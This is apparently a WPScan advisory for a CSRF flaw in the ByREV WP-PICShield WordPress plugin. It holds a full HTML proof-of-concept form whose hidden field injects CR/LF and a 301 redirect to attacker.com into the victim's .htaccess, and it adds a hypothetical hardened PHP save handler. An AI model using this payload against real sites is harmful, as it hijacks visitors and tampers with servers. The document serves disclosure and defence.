ByREV WP-PICShield - Cross-Site Request Forgery (CSRF)

Description
The ByREV WP-PICShield WordPress plugin is vulnerable to CSRF.

When updating the plugin options, several parameters in the issued POST request are written directly to the .htaccess file within the WordPress root directory. An attacker may be able to insert arbitrary lines into the .htaccess file, for example reconfiguring it to redirect visitors to another website or to perform other malicious actions.

While all plugin options can be updated by an attacker via CSRF, the following parameter values are directly inserted into .htaccess:
byhln[gtfo_key]
byhln[images_extension]
byhln[allowed_domains]
byhln[allowed_user_agents]
byhln[allowed_remote_ip]

The attached PoC demonstrates a CSRF payload which rewrites the victim's .htaccess file to redirect to an attacker-controlled website.
Proof of Concept
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://target.com/wordpress/wp-admin/options-general.php?page=byrev_picshield_admin" method="POST">
      <input type="hidden" name="byhln&#95;hidden" value="Y" />
      <input type="hidden" name="byhln&#91;wp&#45;picshield&#45;version&#93;" value="1&#46;9&#46;7" />
      <input type="hidden" name="byhln&#91;enable&#95;hotlink&#95;gtfo&#93;" value="1" />
      <input type="hidden" name="byhln&#91;gtfo&#95;key&#93;" value="csrf&#13;&#10;Redirect&#32;301&#32;&#47;&#32;http&#58;&#47;&#47;attacker&#46;com&#47;&#13;&#10;&#35;" />
      <input type="hidden" name="byhln&#91;hotlink&#95;cache&#95;folder&#93;" value="&#126;hotlink&#45;cache" />
      <input type="hidden" name="byhln&#91;image&#95;source&#95;transparency&#93;" value="65" />
      <input type="hidden" name="byhln&#91;watermark&#95;enabled&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;pass&#95;through&#93;" value="1" />
      <input type="hidden" name="byhln&#91;watermark&#95;png&#95;file&#93;" value="watermark&#46;png" />
      <input type="hidden" name="byhln&#91;watermark&#95;position&#93;" value="0" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;watermark&#93;" value="1" />
      <input type="hidden" name="byhln&#91;blend&#95;bar&#95;opacity&#93;" value="25" />
      <input type="hidden" name="byhln&#91;write&#95;host&#95;source&#93;" value="1" />
      <input type="hidden" name="byhln&#91;write&#95;time&#95;cached&#95;over&#95;image&#93;" value="0" />
      <input type="hidden" name="byhln&#91;print&#95;qr&#95;host&#93;" value="0" />
      <input type="hidden" name="byhln&#91;send&#95;hotlink&#95;gtfo&#95;header&#95;signature&#93;" value="0" />
      <input type="hidden" name="byhln&#91;redirect&#95;direct&#95;link&#95;images&#95;from&#95;google&#93;" value="1" />
      <input type="hidden" name="byhln&#91;redirect&#95;404&#95;not&#95;found&#95;image&#93;" value="&#47;image&#45;not&#45;found&#47;" />
      <input type="hidden" name="byhln&#91;redirect&#95;not&#95;found&#95;image&#95;code&#93;" value="404&#32;Not&#32;Found" />
      <input type="hidden" name="byhln&#91;maximum&#95;megapixels&#95;size&#93;" value="3" />
      <input type="hidden" name="byhln&#91;images&#95;extension&#93;" value="jpg&#32;jpeg&#32;png&#32;gif" />
      <input type="hidden" name="byhln&#91;allowed&#95;domains&#93;" value="www&#46;zjulian&#46;com" />
      <input type="hidden" name="byhln&#91;allowed&#95;user&#95;agents&#93;" value="googlebot&#13;&#10;msnbot&#13;&#10;baiduspider&#13;&#10;slurp&#13;&#10;webcrawler&#13;&#10;teoma&#13;&#10;photon" />
      <input type="hidden" name="byhln&#91;allowed&#95;remote&#95;ip&#93;" value="" />
      <input type="hidden" name="byhln&#91;allow&#95;online&#95;translators&#93;" value="1" />
      <input type="hidden" name="byhln&#91;allow&#95;socials&#93;" value="1" />
      <input type="hidden" name="byhln&#91;x&#95;frame&#95;sameorgin&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;enabled&#93;" value="0" />
      <input type="hidden" name="byhln&#91;log&#95;referer&#95;table&#93;" value="&#42;&#42;&#32;disabled&#32;&#42;&#42;" />
      <input type="hidden" name="byhln&#91;write&#95;credit&#95;plugin&#93;" value="1" />
      <input type="hidden" name="Submit" value="Update&#32;Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
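
A hardened version of the option-save path, written here as an added example (hypothetical code, not the plugin's own): a WordPress nonce check closes the CSRF, and each of the five parameters listed above is validated before it can reach .htaccess. Decoded, the byhln[gtfo_key] value in the PoC contains CR/LF and a Redirect directive, so it fails the gtfo_key pattern and is never written; the function names and the nonce action 'byhln_save' are assumptions.

```php
<?php
// Hypothetical hardened save handler for the five byhln[...] options that are
// written to .htaccess (added example, not the plugin's own code). Function
// names and the nonce action 'byhln_save' are assumptions; keys come from the advisory.

function byhln_validate_option( $key, $value ) {
    switch ( $key ) {
        case 'gtfo_key':
            // One opaque token: no whitespace, '#' or CR/LF, so it can never
            // start a new .htaccess line. \z also rejects a trailing newline.
            return preg_match( '/^[A-Za-z0-9_-]{1,64}\z/', $value ) ? $value : null;
        case 'images_extension':
        case 'allowed_domains':
        case 'allowed_user_agents':
        case 'allowed_remote_ip':
            // List fields: split on whitespace, vet each token, re-join with
            // single spaces so only validated tokens reach the writer.
            $tokens = preg_split( '/\s+/', trim( $value ), -1, PREG_SPLIT_NO_EMPTY );
            foreach ( $tokens as $t ) {
                $ok = ( 'allowed_remote_ip' === $key )
                    ? false !== filter_var( $t, FILTER_VALIDATE_IP )
                    : (bool) preg_match( '/^[A-Za-z0-9.-]{1,253}\z/', $t );
                if ( ! $ok ) return null;
            }
            return implode( ' ', $tokens );
    }
    return null; // unknown key: never written
}

function byhln_handle_save() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.' );
    }
    // CSRF fix: the settings form must emit wp_nonce_field( 'byhln_save' );
    // a cross-site form cannot supply the nonce, so this call dies first.
    check_admin_referer( 'byhln_save' );
    $keys  = array( 'gtfo_key', 'images_extension', 'allowed_domains',
                    'allowed_user_agents', 'allowed_remote_ip' );
    $clean = array();
    foreach ( $keys as $key ) {
        $raw = isset( $_POST['byhln'][ $key ] ) ? wp_unslash( $_POST['byhln'][ $key ] ) : '';
        $val = byhln_validate_option( $key, $raw );
        if ( null === $val ) {
            wp_die( 'Rejected value for option ' . esc_html( $key ) . '.' );
        }
        $clean[ $key ] = $val;
    }
    update_option( 'byhln', $clean ); // .htaccess is regenerated from $clean only
}
```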

Affects

Plugin byrev-wp-picshield-hotlink-defence

References

URL http://wp-picshield.com/

Classification

Type CSRF
OWASP Top 10 A8: Cross-Site Request Forgery (CSRF)
CWE CWE-352

Miscellaneous

Submitter Zachary Julian
Submitter Website zjulian.com
Submitter Twitter @tprime_
Verified No
WPVDB ID 8738

Timeline

Publicly Published 2017-01-04
Added 2017-02-22
Last Updated 2017-02-22

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.